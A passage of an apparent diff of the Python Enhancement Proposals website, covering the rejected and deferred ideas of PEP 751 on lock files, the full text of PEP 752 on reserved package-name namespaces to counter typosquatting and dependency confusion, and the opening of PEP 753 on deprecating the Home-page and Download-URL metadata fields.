At one point, to handle the issue of metadata varying between files (and thus requiring examination of every released file for a package and version for accurate locking results), the idea was floated to introduce a new core metadata version which would require all metadata for all wheel files to be the same for a single version of a package. Ultimately, though, it was deemed unnecessary as this PEP will put pressure on people to make files consistent for performance reasons or to make indexes provide all the metadata separate from the wheel files themselves. As well, there’s no easy enforcement mechanism, and so community expectation would work as well as a new metadata version.

+
+
+

Have the installer do dependency resolution

+

In order to support a format more akin to how Poetry worked when this PEP was +drafted, it was suggested that lockers effectively record the packages and their +versions which may be necessary to make an install work in any possible +scenario, and then the installer resolves what to install. But that complicates +auditing a lock file by requiring much more mental effort to know what packages +may be installed in any given scenario. Also, one of the Poetry developers +suggested +that markers as represented in the package locking approach of this PEP may be +sufficient to cover the needs of Poetry. Not having the installer do a +resolution also simplifies their implementation, centralizing complexity in +lockers.

+
+
+

Requiring specific hash algorithm support

+

It was proposed to require a baseline hash algorithm for the files. This was rejected as no other Python packaging specification requires specific hash algorithm support. As well, the minimum hash algorithm suggested may eventually become an outdated/unsafe suggestion, requiring further updates. To promote using the best algorithm at all times, no baseline is provided, so tools do not simply default to it without considering its security ramifications.

+
+
+

Require a URL or file path for files

+

Originally references to files were required, e.g., packages.sdist.url or +packages.sdist.path. But at least +one use-case +surfaced during discussions about this PEP where statically specifying the +location of files would be problematic. And in earlier discussions the idea of +the location being a hint wasn’t preferred. Hence the PEP now makes the data +optional, but considers the locations accurate if specified.

+
+
+

File naming

+
+

Using *.pylock.toml as the file name

+

It was proposed to put the pylock constant part of the file name after the identifier for the purpose of the lock file. It was decided not to do this so that lock files sort together in a directory listing instead of sorting purely by purpose, which could spread them out across the listing.

+
+
+

Using *.pylock as the file name

+

Not using .toml as the file extension and instead making it .pylock +itself was proposed. This was decided against so that code editors would know +how to provide syntax highlighting to a lock file without having special +knowledge about the file extension.

+
+
+

Not having a naming convention for the file

+

Having no requirements or guidance for a lock file’s name was considered, but +ultimately rejected. By having a standardized naming convention it makes it easy +to identify a lock file for both a human and a code editor. This helps +facilitate discovery when e.g. a tool wants to know all of the lock files that +are available.

+
+
+
+

File format

+
+

Use JSON over TOML

+

Since having a format that is machine-writable was a goal of this PEP, it was +suggested to use JSON. But it was deemed less human-readable than TOML while +not improving on the machine-writable aspect enough to warrant the change.

+
+
+

Use YAML over TOML

+

Some argued that YAML met the machine-writable/human-readable requirement in a +better way than TOML. But as that’s subjective and pyproject.toml already +existed as the human-writable file used by Python packaging standards it was +deemed more important to keep using TOML.

+
+
+
+

Other keys

+
+

Multiple hashes per file

+

An initial version of this PEP proposed supporting multiple hashes per file. The +idea was to allow one to choose which hashing algorithm they wanted to go with +when installing. But upon reflection it seemed like an unnecessary complication +as there was no guarantee the hashes provided would satisfy the user’s needs. +As well, if the single hash algorithm used in the lock file wasn’t sufficient, +rehashing the files involved as a way to migrate to a different algorithm didn’t +seem insurmountable.

+
+
+

Hashing the contents of the lock file itself

+

Hashing the bytes of the file and storing the hash value within the file itself was proposed at some point. This was removed to make merging changes to the lock file easier, as each merge would otherwise have to recalculate the hash value to avoid a merge conflict.

+

Hashing the semantic contents of the file was also proposed, but it would lead +to the same merge conflict issue.

+

Regardless of which contents were hashed, either approach could have the hash +value stored outside of the file if such a hash was desired.

+
+
+

Recording the creation date of the lock file

+

To know how potentially stale the lock file was, an earlier proposal suggested recording its creation date. But for the same merge-conflict reasons as storing the hash of the file contents, this idea was dropped.

+
+
+

Recording the package indexes used

+

Recording what package indexes were used by the locker to decide what to lock +for was considered. In the end, though, it was rejected as it was deemed +unnecessary bookkeeping.

+
+
+

Locking build requirements for sdists

+

An earlier version of this PEP tried to lock the build requirements for sdists +under a packages.build-requires key. Unfortunately it confused enough people +about how it was expected to operate and there were enough edge case issues to +decide it wasn’t worth trying to do in this PEP upfront. Instead, a future PEP +could propose a solution.

+
+
+
+
+

Open Issues

+
+

Specify requires-python at the file level?

+

The lock file formats from PDM, Poetry, and uv all specify +requires-python at the top level for the absolute minimum Python version +needed for the lock file. This can be inferred, though, by examining all +packages.requires-python values. The global value might also not be +accurate for all platforms depending on how environment markers influence what +package versions are installed and what their Python version requirements are.
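A sketch of that inference, assuming every [[packages]] entry carries a requires-python key and using packaging’s specifier intersection:

from packaging.specifiers import SpecifierSet

def inferred_requires_python(lock_file_data):
    combined = SpecifierSet()  # An empty set matches all versions.
    for package in lock_file_data["packages"]:
        combined &= SpecifierSet(package["requires-python"])
    return combined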

+
+
+

Don’t pre-parse data?

+

This PEP currently takes the viewpoint that if a piece of data is going to be parsed by installers every time they run, then pre-parsing as much as possible so the TOML parser can help is a good thing. The thinking is that TOML parsers have a higher chance of being optimized, and so letting them do more parsing leads to a faster outcome. It should also increase readability by breaking the data apart upfront.

+

But in the case of doing this to wheel file names, some might consider it too much. The question becomes whether separating out all the parts of a wheel file name hinders readability (because people are used to reading the file names already), or whether clearly separating its parts helps make installers faster and easier to write without actually hindering readability.

+

This all equally applies to requirement specifiers.
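For comparison, this is roughly the parsing installers would repeat on every run if wheel file names and requirement specifiers were recorded verbatim (the file name and specifier are taken from the examples earlier in this PEP):

from packaging.requirements import Requirement
from packaging.utils import parse_wheel_filename

name, version, build, tags = parse_wheel_filename(
    "numpy-2.1.2-cp312-cp312-win_amd64.whl"
)
requirement = Requirement('mypy>=1.11.1; python_version >= "3.9"')
# Pre-parsing stores name/version/tags and name/specifier/marker as
# separate TOML values so installers can skip this work.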

+
+
+
+

Deferred Ideas

+
+

Per-file locking

+

An earlier version of this PEP supported two approaches to locking: per-file and per-package. The idea behind the former approach was that if you were locking for an a-priori set of environments you could lock to just the files necessary to install into those environments. The thinking was that by only listing a subset of files, auditing would be easier.

+

Unfortunately there was disagreement on how best to express upfront what the supported environment requirements would be. Since what this PEP currently proposes still prevents accidental success of installation into unsupported environments, this idea has been deferred until such time as someone can come up with a representation that makes sense.

+
+
+

Allowing for multiple lock files

+

Before the introduction of [[groups]], this PEP proposed supporting multiple +lock files that would match the regular expression +r"pylock\.(.+)\.toml" if a name for the lock file is desired or if multiple +lock files exist. But since [[groups]] subsumes a lot of the need to support +multiple lock files, this specific feature can be postponed until such time that +a need is shown to support multiple lock files.

+
+
+
+

Acknowledgements

+

Thanks to everyone who participated in the discussions on discuss.python.org. +Also thanks to Randy Döring, Seth Michael Larson, Paul Moore, and Ofek Lev for +providing feedback on a draft version of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0751.rst

+

Last modified: 2024-11-05 19:18:47 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0752/index.html b/pep-0752/index.html new file mode 100644 index 00000000000..ff1bfa007a6 --- /dev/null +++ b/pep-0752/index.html @@ -0,0 +1,842 @@ + PEP 752 – Implicit namespaces for package repositories | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 752 – Implicit namespaces for package repositories

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Dustin Ingram <di at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
13-Aug-2024
+
Post-History:
+
18-Aug-2024, +07-Sep-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a way for organizations to reserve package name prefixes +for future uploads.

+
+
“Namespaces are one honking great idea – let’s do more of +those!” - PEP 20
+
+
+

Motivation

+

The current ecosystem lacks a way for projects with many packages to signal a +verified pattern of ownership. Such projects fall into two categories.

+

The first category is projects [1] that want complete control over their +namespace. A few examples:

+
    +
  • Major cloud providers like Amazon, Google and Microsoft have a common prefix +for each feature’s corresponding package [3]. For example, most of Google’s +packages are prefixed by google-cloud- e.g. google-cloud-compute for +using virtual machines.
  • +
  • OpenTelemetry is an open standard for +observability with official packages for the core APIs and SDK with +contrib packages to collect data from various sources. All packages +are prefixed by opentelemetry- with child prefixes in the form +opentelemetry-<component>-<name>-. The contrib packages live in a +central repository and they are the only ones with the ability to publish.
  • +
+

The second category is projects [2] that want to share their namespace such +that some packages are officially maintained and third-party developers are +encouraged to participate by publishing their own. Some examples:

+
    +
  • Project Jupyter is devoted to the development of +tooling for sharing interactive documents. They support extensions +which in most cases (and in all cases for officially maintained +extensions) are prefixed by jupyter-.
  • +
  • Django is one of the most widely used web +frameworks in existence. They have the concept of reusable apps, which +are commonly installed via +third-party packages that implement a subset +of functionality to extend Django-based websites. These packages are by +convention prefixed by django- or dj-.
  • +
+

Such projects are uniquely vulnerable to name-squatting attacks +which can ultimately result in dependency confusion.

+

For example, say a new product is released for which monitoring would be valuable. It would be reasonable to assume that Datadog would eventually support it as an official integration. It takes a nontrivial amount of time to deliver such an integration due to roadmap prioritization and the time required for implementation. It would be impossible to reserve the name of every potential package, so in the interim an attacker may create a package that appears legitimate but executes malicious code at runtime. Not only are users more likely to install such packages, but doing so taints the perception of the entire project.

+

Although PEP 708 attempts to address this attack vector, it is specifically +about the case of multiple repositories being considered during dependency +resolution and does not offer any protection to the aforementioned use cases.

+

Namespacing also would drastically reduce the incidence of +typosquatting +because typos would have to be in the prefix itself which is +normalized and likely to be a short, well-known identifier like +aws-. In recent years, typosquatting has become a popular attack vector +[4].

+

The current protection against typosquatting used by PyPI is to normalize +similar characters but that is insufficient for these use cases.

+
+
+

Rationale

+

Other package ecosystems have generally solved this problem by taking one of +two approaches: either minimizing or maximizing backwards compatibility.

+
    +
  • NPM has the concept of +scoped packages which were +introduced primarily to combat there being a dearth of available good +package names (whether a real or perceived phenomenon). When a user or +organization signs up they are given a scope that matches their name. For +example, the +package for using +Google Cloud Storage is @google-cloud/storage where @google-cloud/ is +the scope. Regular user accounts (non-organization) may publish unscoped +packages for public use. +This approach has the lowest amount of backwards compatibility because every +installer and tool has to be modified to account for scopes.
  • +
  • NuGet has the concept of +package ID prefix reservation which was +introduced primarily to satisfy users wishing to know where a package +came from. A package name prefix may be reserved for use by one or more +owners. Every reserved package has a special indication +on its page to +communicate this. After reservation, any upload with a reserved prefix will +fail if the user is not an owner of the prefix. Existing packages that have a +prefix that is owned may continue to release as usual. This approach has the +highest amount of backwards compatibility because only modifications to +indices like PyPI are required and installers do not need to change.
  • +
+

This PEP specifies the NuGet approach of authorized reservation across a flat +namespace. Any solution that requires new package syntax must be built atop the +existing flat namespace and therefore implicit namespaces acquired via a +reservation mechanism would be a prerequisite to such explicit namespaces.

+

Although existing packages matching a reserved namespace would be untouched, +preventing future unauthorized uploads and strategically applying PEP 541 +takedown requests for malicious cases would reduce risks to users to a +negligible level.

+
+
+

Terminology

+

The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be +interpreted as described in RFC 2119.

+
+
Organization
Organizations are entities that own projects and have various +users associated with them.
+
Grant
A grant is a reservation of a namespace for a package repository.
+
Open Namespace
An open namespace allows for uploads from any project +owner.
+
Restricted Namespace
A restricted namespace only allows uploads from an owner of the namespace.
+
Parent Namespace
A namespace’s parent refers to the namespace without the trailing +hyphenated component e.g. the parent of foo-bar is foo.
+
Child Namespace
A namespace’s child refers to the namespace with additional trailing +hyphenated components e.g. foo-bar is a valid child of foo as is +foo-bar-baz.
+
+
+
+

Specification

+
+

Organizations

+

Any package repository that allows for the creation of projects (e.g. +non-mirrors) MAY offer the concept of organizations. Organizations +are entities that own projects and have various users associated with them.

+

Organizations MAY reserve one or more namespaces. Such reservations neither +confer ownership nor grant special privileges to existing projects.

+
+
+

Naming

+

A namespace MUST be a valid project name and normalized internally e.g. +foo.bar would become foo-bar.

+
+
+

Semantics

+

A namespace grant bestows ownership over the following:

+
    +
  1. A project matching the namespace itself such as the placeholder package microsoft.
  2. Projects that start with the namespace followed by a hyphen. For example, the namespace foo would match the normalized project name foo-bar but not the project name foobar.
+

Package name matching acts upon the normalized namespace.
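A sketch of this matching rule using packaging’s name normalization (the function name is illustrative, not part of this PEP):

from packaging.utils import canonicalize_name

def grant_matches(namespace, project_name):
    namespace = canonicalize_name(namespace)  # e.g. 'foo.bar' -> 'foo-bar'
    project = canonicalize_name(project_name)
    return project == namespace or project.startswith(namespace + "-")

assert grant_matches("foo", "foo-bar")
assert not grant_matches("foo", "foobar")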

+

Namespaces are per-package repository and SHALL NOT be shared between +repositories. For example, if PyPI has a namespace microsoft that is owned +by the company Microsoft, packages starting with microsoft- that come from +other non-PyPI mirror repositories do not confer the same level of trust.

+

Grants MUST NOT overlap. For example, if there is an existing grant +for foo-bar then a new grant for foo would be forbidden. An overlap is +determined by comparing the normalized proposed namespace with the +normalized namespace of every existing root grant. Every comparison must append +a hyphen to the end of the proposed and existing namespace. An overlap is +detected when any existing namespace starts with the proposed namespace.
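A sketch of the overlap detection just described; appending the hyphen is what keeps e.g. foobar from colliding with foo:

from packaging.utils import canonicalize_name

def overlaps(proposed, existing_root_grants):
    prefix = canonicalize_name(proposed) + "-"
    return any(
        (canonicalize_name(existing) + "-").startswith(prefix)
        for existing in existing_root_grants
    )

assert overlaps("foo", ["foo-bar"])     # a new 'foo' grant is forbidden
assert not overlaps("foo", ["foobar"])  # no hyphen boundary, no overlap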

+
+
+

Uploads

+

If the following criteria are all true for a given upload:

+
    +
  1. The project does not yet exist.
  2. The name matches a reserved namespace.
  3. The project is not owned by an organization with an active grant for the namespace.
+

Then the upload MUST fail with a 403 HTTP status code.
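A sketch of this rule, folded together with the open-namespaces allowance described next (the grant record shape is hypothetical):

def upload_permitted(project_exists, grant, uploader_org):
    # No matching reserved namespace, or the project already exists:
    # the namespace rules place no restriction on this upload.
    if project_exists or grant is None:
        return True
    # New project in a reserved namespace: permitted for grant owners,
    # or for anyone when the namespace is open; otherwise HTTP 403.
    return grant["open"] or uploader_org in grant["owners"]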

+
+
+

Open Namespaces

+

The owner of a grant may choose to allow others the ability to release new +projects with the associated namespace. Doing so MUST allow +uploads for new projects matching the namespace from any user.

+

It is possible for the owner of a namespace to both make it open and allow +other organizations to use the grant. In this case, the authorized +organizations have no special permissions and are equivalent to an open grant +without ownership.

+
+
+

Hidden Grants

+

Repositories MAY create hidden grants that are not visible to the public which +prevent their namespaces from being claimed by others. Such grants MUST NOT be +open and SHOULD NOT be exposed in the +API.

+

Hidden grants are useful for repositories that wish to enforce upload +restrictions without the need to expose the namespace to the public.

+
+
+

Repository Metadata

+

The JSON API version will be incremented from 1.2 to 1.3. +The following API changes MUST be implemented by repositories that support +this PEP. Repositories that do not support this PEP MUST NOT implement these +changes so that consumers of the API are able to determine whether the +repository supports this PEP.

+
+

Project Detail

+

The project detail response will be modified as +follows.

+

The namespace key MUST be null if the project does not match an active +namespace grant. If the project does match a namespace grant, the value MUST be +a mapping with the following keys:

+
    +
  • prefix: This is the associated normalized namespace e.g. foo-bar. If the owner of the project owns multiple matching grants then this MUST be the namespace with the greatest number of characters. For example, if the project name matched both foo-bar and foo-bar-baz then this key would be the latter.
  • +
  • authorized: This is a boolean and will be true if the project owner +is an organization and is one of the current owners of the grant. This is +useful for tools that wish to make a distinction between official and +community packages.
  • +
  • open: This is a boolean indicating whether the namespace is +open.
  • +
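A hypothetical project-detail payload and how a tool might consume it (all field values are invented for illustration):

project_detail = {
    "name": "google-cloud-compute",
    "namespace": {
        "prefix": "google-cloud",
        "authorized": True,
        "open": False,
    },
}

namespace = project_detail["namespace"]
if namespace is not None and namespace["authorized"]:
    print(f"official package in the {namespace['prefix']!r} namespace")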
+
+
+

Namespace Detail

+

The format of this URL is /namespace/<namespace> where <namespace> is +the normalized namespace. For example, the URL for the namespace +foo.bar would be /namespace/foo-bar.

+

The response will be a mapping with the following keys:

+
    +
  • prefix: This is the normalized version of the namespace e.g. +foo-bar.
  • +
  • owner: This is the organization that is responsible for the namespace.
  • +
  • open: This is a boolean indicating whether the namespace is +open.
  • +
  • parent: This is the parent namespace if it exists. For example, if the +namespace is foo-bar and there is an active grant for foo, then this +would be "foo". If there is no parent then this key will be null.
  • +
  • children: This is an array of any child namespaces. For example, if the +namespace is foo and there are active grants for foo-bar and +foo-bar-baz then this would be ["foo-bar", "foo-bar-baz"].
  • +
+
+
+
+

Grant Removal

+

When a reserved namespace becomes unclaimed, repositories MUST set the +namespace key to null in the API.

+

Namespaces that were previously claimed but are now unclaimed SHOULD be eligible to be claimed again by any organization.

+
+
+
+

Community Buy-in

+

Representatives from the following organizations have expressed support for +this PEP (with a link to the discussion):

+ +
+
+

Backwards Compatibility

+

There are no intrinsic concerns because there is still a flat namespace and +installers need no modification. Additionally, many projects have already +chosen to signal a shared purpose with a prefix like typeshed has done.

+
+
+

Security Implications

+
    +
  • There is an opportunity to build on top of PEP 740 and PEP 480 so that +one could prove cryptographically that a specific release came from an owner +of the associated namespace. This PEP makes no effort to describe how this +will happen other than that work is planned for the future.
  • +
+
+
+

How to Teach This

+

For consumers of packages we will document how metadata is exposed in the API and potentially, in the future, note tooling that supports utilizing namespaces to provide extra security guarantees during installation.

+
+
+

Reference Implementation

+

None at this time.

+
+
+

Rejected Ideas

+
+

Artifact-level Namespace Association

+

An earlier version of this PEP proposed that metadata be associated with +individual artifacts at the point of release. This was rejected because it +had the potential to cause confusion for users who would expect the namespace +authorization guarantee to be at the project level based on current grants +rather than the time at which a given release occurred.

+
+
+

Organization Scoping

+

The primary motivation for this PEP is to reduce dependency confusion attacks +and NPM-style scoping with an allowance of the legacy flat namespace would +increase the risk. If documentation instructed a user to install bar in the +namespace foo then the user must be careful to install @foo/bar and not +foo-bar, or vice versa. The Python packaging ecosystem has normalization +rules for names in order to maximize the ease of communication and this would +be a regression.

+

The runtime environment of Python is also not conducive to scoping. Whereas +multiple versions of the same JavaScript package may coexist, Python only +allows a single global namespace. Barring major changes to the language itself, +this is nearly impossible to change. Additionally, users have come to expect +that the package name is usually the same as what they would import and +eliminating the flat namespace would do away with that convention.

+

Scoping would be particularly affected by organization changes which are bound +to happen over time. An organization may change their name due to internal +shuffling, an acquisition, or any other reason. Whenever this happens every +project they own would in effect be renamed which would cause unnecessary +confusion for users, frequently.

+

Finally, the disruption to the community would be massive because it would +require an update from every package manager, security scanner, IDE, etc. New +packages released with the scoping would be incompatible with older tools and +would cause confusion for users along with frustration from maintainers having +to triage such complaints.

+
+
+

Encourage Dedicated Package Repositories

+

Critically, this imposes a burden on projects to maintain their own infra. This +is an unrealistic expectation for the vast majority of companies and a complete +non-starter for community projects.

+

This does not help in most cases because the default behavior of most package +managers is to use PyPI so users attempting to perform a simple pip install +would already be vulnerable to malicious packages.

+

In this theoretical future every project must document how to add their +repository to dependency resolution, which would be different for each package +manager. Few package managers are able to download specific dependencies from +specific repositories and would require users to use verbose configuration in +the common case.

+

The ones that do not support this would instead find a given package using an +ordered enumeration of repositories, leading to dependency confusion. +For example, say a user wants two packages from two custom repositories X +and Y. If each repository has both packages but one is malicious on X +and the other is malicious on Y then the user would be unable to satisfy +their requirements without encountering a malicious package.

+
+
+

Exclusive Reliance on Provenance Assertions

+

The idea here [5] would be to design a general purpose way for clients to make +provenance assertions to verify certain properties of dependencies, each with +custom syntax. Some examples:

+
    +
  • The package was uploaded by a specific organization or user name e.g. +pip install "azure-loganalytics from microsoft"
  • +
  • The package was uploaded by an owner of a specific domain name e.g. +pip install "google-cloud-compute from cloud.google.com"
  • +
  • The package was uploaded by a user with a specific email address e.g. +pip install "aws-cdk-lib from contact@amazon.com"
  • +
  • The package matching a namespace was uploaded by an authorized party (this +PEP)
  • +
+

A fundamental downside is that it doesn’t play well with multiple +repositories. For example, say a user wants the azure-loganalytics package +and wants to ensure it comes from the organization named microsoft. If +Microsoft’s organization name on PyPI is microsoft then a package manager +that defaults to PyPI could accept azure-loganalytics from microsoft. +However, if multiple repositories are used for dependency resolution then the +user would have to specify the repository as part of the definition which is +unrealistic for reasons outlined in the dedicated section on +asserting package owner names.

+

Another general weakness with this approach is that a user attempting to +perform a simple pip install without special syntax, which is the most +common scenario, would already be vulnerable to malicious packages. In order to +overcome this there would have to be some default trust mechanism, which in all +cases would impose certain UX or resolver logic upon every tool.

+

For example, package managers could be changed such that the first time a +package is installed the user would receive a confirmation prompt displaying +the provenance details. This would be very confusing and noisy, especially for +new users, and would be a breaking UX change for existing users. Many methods +of installation wouldn’t work for this scenario such as running in CI or +installing from a requirements file where the user would potentially be getting +hundreds of prompts.

+

One solution to make this less disruptive for users would be to manually +maintain a list of trustworthy details (organization/user names, domain names, +email addresses, etc.). This could be discoverable by packages providing +entry points which package managers could learn to detect and which +corporate environments could install by default. This has the major downside of +not providing automatic guarantees which would limit the usefulness for the +average user who is more likely to be affected.

+

There are two ideas that could be used to provide automatic protection, which +could be based on PEP 740 attestations or a new mechanism for utilizing +third-party APIs that host the metadata.

+

First, each repository could offer a service that verifies the owner of a +package using whatever criteria they deem appropriate. After verification, the +repository would add the details to a dedicated package that would be installed +by default.

+

This would require dedicated maintenance which is unrealistic for most +repositories, even PyPI currently. It’s unclear how community projects without +the resources for something like a domain name would be supported. Critically, +this solution would cause extra confusion for users in the case of multiple +repositories as each might have their own verification processes, attestation +criteria and default package containing the verified details. It would be +challenging to get community buy-in of every package manager to be aware of +each repositories’ chosen verification package and install that by default +before dependency resolution.

+

Should digital attestations become the chosen mechanism, a downside is that +implementing this in custom package repositories would require a significant +amount of work. In the case of PyPI, the prerequisite work on +Trusted Publishing and then the PEP 740 implementation itself took the +equivalent of a full-time engineer one year whose time was paid for by a +corporate sponsor. Other organizations are unlikely to implement similar work +because simpler mechanisms make it possible to implement reproducible builds. +When everything is internally managed, attestations are also not very useful. +Community projects are unlikely to undertake this effort because they would +likely lack the resources to maintain the necessary infrastructure themselves +and moreover there are significant downsides to +encouraging dedicated package repositories.

+

The other idea would be to host provenance assertions externally and push more +logic client-side. A possible implementation might be to specify a provenance +API that could be hosted at a designated relative path like +/provenance. Projects on each repository could then be configured to point +to a particular domain and this information would be passed on to clients +during installation.

+

While this distributed approach does impose less of an infrastructure burden on repositories, it has the potential to be a security risk. If an external provenance API is compromised, it could lead to malicious packages being installed. If an external API is down, package installation could fail, or package managers might only emit warnings, in which case there is no security benefit.

+

Additionally, this disadvantages community projects that do not have the resources to maintain such an API. They could use free hosting solutions, as many do for documentation, but they would not technically own the infrastructure and would be compromised should those generous offerings be restricted.

+

Finally, while both of these theoretical approaches are not yet prescriptive, +they imply assertions at the artifact level which was already a +rejected idea.

+
+
+

Asserting Package Owner Names

+

This is about asserting that the package came from a specific organization or +user name. It’s quite similar to the +organization scoping idea except that a flat +namespace is the base assumption.

+

This would require modifications to the JSON API of each supported +repository and could be implemented by exposing extra metadata or as proper +provenance assertions.

+

As with the organization scoping idea, a new syntax would be required, like microsoft::azure-loganalytics where microsoft is the organization and azure-loganalytics is the package. Although this plays comparatively well with the existing flat namespace, it retains the critical downside of disrupting the community with the number of changes required.

+

A unique downside is that names are an implementation detail of repositories. +On PyPI, the names of organizations are separate from user names so there is +potential for conflicts. In the case of multiple repositories, users might run +into cases of dependency confusion similar to the one at the end of the +Encourage Dedicated Package Repositories +rejected idea.

+

To ameliorate this, it was suggested that the syntax be expanded to also include the expected repository URL, like microsoft@pypi.org::azure-loganalytics. This syntax, or something like it, is so verbose that it could lead to user confusion and, even worse, frustration should it gain increased adoption among those able to maintain dedicated infrastructure (community projects would not benefit).

+

The expanded syntax is an attempt to standardize resolver behavior and configuration within dependency specifiers. Not only would this mandate the UX of tools, it also lacks precedent in package managers for language ecosystems, with or without the concept of package repositories. In such cases, the resolver configuration is separate from the dependency definition.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Language | Tool | Resolution behavior
Rust | Cargo | Dependency resolution can be modified within Cargo.toml using the [patch] table.
JS | Yarn | Although they have the concept of protocols (which are similar to the URL schemes of our direct references), users configure the resolutions field in the package.json file.
JS | npm | Users can configure the overrides field in the package.json file.
Ruby | Bundler | The Gemfile allows for specifying an explicit source for a gem.
C# | NuGet | It’s possible to override package versions by configuring the Directory.Packages.props file.
PHP | Composer | The composer.json file allows for specifying repository sources for specific packages.
Go | go | The go.mod file allows for specifying a replace directive. Note that this is used for direct dependencies as well as transitive dependencies.
+
+
+

Use Fixed Prefixes

+

The idea here would be to have one or more top-level fixed prefixes that are +used for namespace reservations:

+
    +
  • com-: Reserved for corporate organizations.
  • +
  • org-: Reserved for community organizations.
  • +
+

Organizations would then apply for a namespace prefixed by the type of their +organization.

+

This would cause perpetual disruption because, when projects begin, it is unknown whether the user base will be large enough to warrant a namespace reservation. Whenever that happens, the project would have to be renamed, which would put a high maintenance burden on the project maintainers and would cause confusion for users who have to learn a new way to reference the project’s packages. The potential for this deterring projects from reserving namespaces at all is high.

+

Another issue with this approach is that projects often have branding in mind +(example) and would be reluctant to change their package names.

+

It’s unrealistic to expect every company and project to voluntarily change +their existing and future package names.

+
+
+

Use DNS

+

The idea here is to add a new metadata field, called domain-authority, to projects in the API. Repositories would support a new endpoint for verifying the domain via HTTPS. Clients would then support options to allow certain domains.

+

This does not solve the problem for the target audience, who do not check where their packages are coming from; it is more about checking the integrity of uploads, which is already supported in a more secure way by PEP 740.

+

Most projects do not have a domain and could not benefit from this, unfairly +favoring organizations that have the financial means to acquire one.

+
+
+
+

Open Issues

+

None at this time.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0752.rst

+

Last modified: 2024-11-15 21:57:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0753/index.html b/pep-0753/index.html new file mode 100644 index 00000000000..301634cc385 --- /dev/null +++ b/pep-0753/index.html @@ -0,0 +1,535 @@ + + + + + + + + PEP 753 – Uniform project URLs in core metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 753 – Uniform project URLs in core metadata

+
+
Author:
+
William Woodruff <william at yossarian.net>, +Facundo Tuesca <facundo.tuesca at trailofbits.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
29-Aug-2024
+
Post-History:
+
26-Aug-2024, +03-Sep-2024
+
Resolution:
+
10-Oct-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Well-known Project URLs in Metadata, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP recommends two discrete changes to the processing of core metadata by +indices (such as PyPI) and other core metadata consumers:

+
    +
  • Deprecation of the Home-page and Download-URL fields in favor of +their Project-URL equivalents;
  • +
  • A set of conventions for normalizing and +assigning semantics to Project-URL labels during consumer-side metadata +processing.
  • +
+
+
+

Rationale and Motivation

+

Python’s standard core metadata has gone +through many years of revisions, with various standardized milestone versions.

+

These revisions of the core metadata have introduced various mechanisms +for expressing a package’s relationship to external resources, via URLs:

+
    +
  1. Metadata 1.0 introduced Home-page, a single-use field containing +a URL to the distribution’s home page.
    Home-page: https://example.com/sampleproject
    +
    +
    +
  2. +
  3. Metadata 1.1 introduced Download-URL, a complementary single-use field +containing a URL suitable for downloading the current distribution.
    Download-URL: https://example.com/sampleproject/sampleproject-1.2.3.tar.gz
    +
    +
    +
  4. +
  5. Metadata 1.2 introduced Project-URL, a multiple-use field containing +a label-and-URL pair. Each label is free text conveying the URL’s semantics.
    Project-URL: Homepage, https://example.com/sampleproject
    +Project-URL: Download, https://example.com/sampleproject/sampleproject-1.2.3.tar.gz
    +Project-URL: Documentation, https://example.com/sampleproject/docs
    +
    +
    +
  6. +
+

Metadata 2.1, 2.2, and 2.3 leave the behavior of these fields as originally +specified.

+

Because Project-URL allows free text labels and is multiple-use, informal +conventions have arisen for representing the values of +Home-page and Download-URL within Project-URL instead.

+

These conventions have seen significant adoption, with PEP 621 explicitly +choosing to provide only a project.urls table rather than a +project.home-page field. From PEP 621’s rejected ideas:

+
+
While the core metadata supports it, having a single field for a project’s +URL while also supporting a full table seemed redundant and confusing.
+

This PEP exists to formalize the informal conventions that have arisen, as well +as explicitly document Home-page and Download-URL as deprecated in +favor of equivalent Project-URL representations.

+
+
+

Specification

+

This PEP proposes that Home-page and Download-URL be considered +deprecated. This deprecation has implications for both package metadata +producers (e.g. build backends and packaging tools) and package indices +(e.g. PyPI).

+
+

Metadata producers

+

This PEP stipulates the following for metadata producers:

+
    +
  • When generating metadata 1.2 or later, producers SHOULD emit only +Project-URL, and SHOULD NOT emit Home-page or Download-URL +fields.
  • +
+

These stipulations do not change the optionality of URL fields in core metadata. +In other words, producers MAY choose to omit Project-URL entirely +at their discretion.

+

This PEP does not propose the outright removal of support for Home-page +or Download-URL. However, see Future Considerations for +thoughts on how a new (as of yet unspecified) major core metadata version +could complete the deprecation cycle via removal of these deprecated fields.

+

Similarly, this PEP does not propose that metadata producers emit +normalized labels. Label normalization is performed +solely on the processing and consumption side (i.e. within indices and other +consumers of distribution metadata).

+
+
+

Package indices

+

This PEP stipulates the following for package indices:

+
    +
  • When interpreting a distribution’s metadata of version 1.2 or later +(e.g. for rendering on a web page), the index MUST prefer +Project-URL fields as a source of URLs over Home-page and +Download-URL, even if the latter are explicitly provided.
  • +
  • If a distribution’s metadata contains only the Home-page and +Download-URL fields, the index MAY choose to ignore those fields +and behave as though no URLs were provided in the metadata. In this case, +the index SHOULD present an appropriate warning or notification to +the uploading party.
      +
